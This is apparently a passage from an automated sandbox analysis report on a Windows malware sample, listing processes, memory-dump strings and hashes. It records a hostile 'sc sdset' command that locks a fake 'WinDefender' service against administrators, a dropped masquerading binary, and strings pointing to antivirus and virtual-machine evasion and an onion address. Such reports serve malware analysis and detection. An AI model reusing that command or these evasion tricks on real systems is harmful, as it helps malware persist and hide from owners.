                                                            Imagebase:0x2a0000
                                                            File size:232960 bytes
                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:16
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                            Imagebase:0xa50000
                                                            File size:60928 bytes
                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:19
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\windefender.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\windefender.exe
                                                            Imagebase:0x400000
                                                            File size:2102272 bytes
                                                            MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:29
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:39:41
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Start time:12:40:00
                                                            Start date:20/10/2021
                                                            Path:C:\Windows\System32\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                            Imagebase:0x7ff6b7590000
                                                            File size:51288 bytes
                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • ", xrefs: 00428CF9
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.358478673.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360301704.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360548861.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360597640.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360646863.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360696579.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360719262.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360737494.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360764527.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.358478673.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360301704.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360548861.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360597640.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360646863.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360696579.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360719262.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360737494.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000001.00000002.360764527.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              • ", xrefs: 00428CF9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.367317542.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370237237.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370498218.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370520784.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370533031.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370544344.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370557916.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370568703.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370584839.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.367317542.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370237237.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370498218.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370520784.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370533031.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370544344.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370557916.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370568703.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000003.00000002.370584839.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • ", xrefs: 00428CF9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.621547127.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627850984.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627931169.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627956348.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627989989.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628006471.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628024487.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628038146.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628067639.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.621547127.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627850984.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627931169.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627956348.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.627989989.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628006471.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628024487.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628038146.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000008.00000002.628067639.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu, xrefs: 00428CF0
                                                              • bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert, xrefs: 00428C95
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428CBC
                                                              • ", xrefs: 00428CF9
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi, xrefs: 00428C26
                                                              • ,-./01456:;<=>?@BCLMNOPSZ["\, xrefs: 00428C50
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000010.00000002.384616136.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.390869312.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp Download File
